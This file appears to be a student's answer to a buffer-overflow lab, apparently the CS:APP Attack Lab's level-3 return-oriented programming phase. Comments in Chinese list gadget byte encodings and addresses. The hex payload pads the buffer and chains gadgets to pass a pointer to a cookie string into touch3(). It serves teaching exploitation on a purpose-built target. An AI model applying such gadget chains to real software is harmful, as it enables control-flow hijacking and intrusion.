/*
允许使用的寄存器: rax rdx rcx rbx rdi rsi rbp rsp
movq : 0x48 0x89 0x??(0xc0-0xff)
popq : 0x58-0x5f
movl : 0x89 0x??(0xc0-0xff)
ret : 0xc3
nop : 0x90

可用指令:
48 89 e0            # movq %rsp , %rax ;                            0x401aad
48 89 c7            # movq %rax , %rdi ;                            0x4019c5

58 90               # popq %rax ;                                   0x4019cc
89 c2               # movl %eax , %edx ;                            0x4019dd
89 d1 38 c9         # movl %edx , %ecx ;(38 c9:comp == nop)         0x401a34    
89 ce               # movl %ecx , %esi ;                            0x401a13                      

89 c7               # movl %eax , %edi ;                            0x4019a4

48 8d 04 37         # leaq(%rdi,%rsi,1) , %rax                      0x4019d6

not used: 89 e0     # movl %esp , %eax ;                            0x401a07

str: 35 39 62 39 39 37 66 61 00
*/
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
cc 19 40 00 00 00 00 00     /* popq %rax */
20 00 00 00 00 00 00 00     /* offset: */
dd 19 40 00 00 00 00 00     /* movl %eax , %edx */
34 1a 40 00 00 00 00 00     /* movl %edx , %ecx */
13 1a 40 00 00 00 00 00     /* movl %ecx , %esi */
ad 1a 40 00 00 00 00 00     /* movq %rsp , %rax */
c5 19 40 00 00 00 00 00     /* movq %rax , %rdi */
d6 19 40 00 00 00 00 00     /* leaq(%rdi,%rsi,1) , %rax */
c5 19 40 00 00 00 00 00     /* movq %rax , %rdi */
fa 18 40 00 00 00 00 00     /* ret to touch3() */
35 39 62 39 39 37 66 61 00  /* cookie */
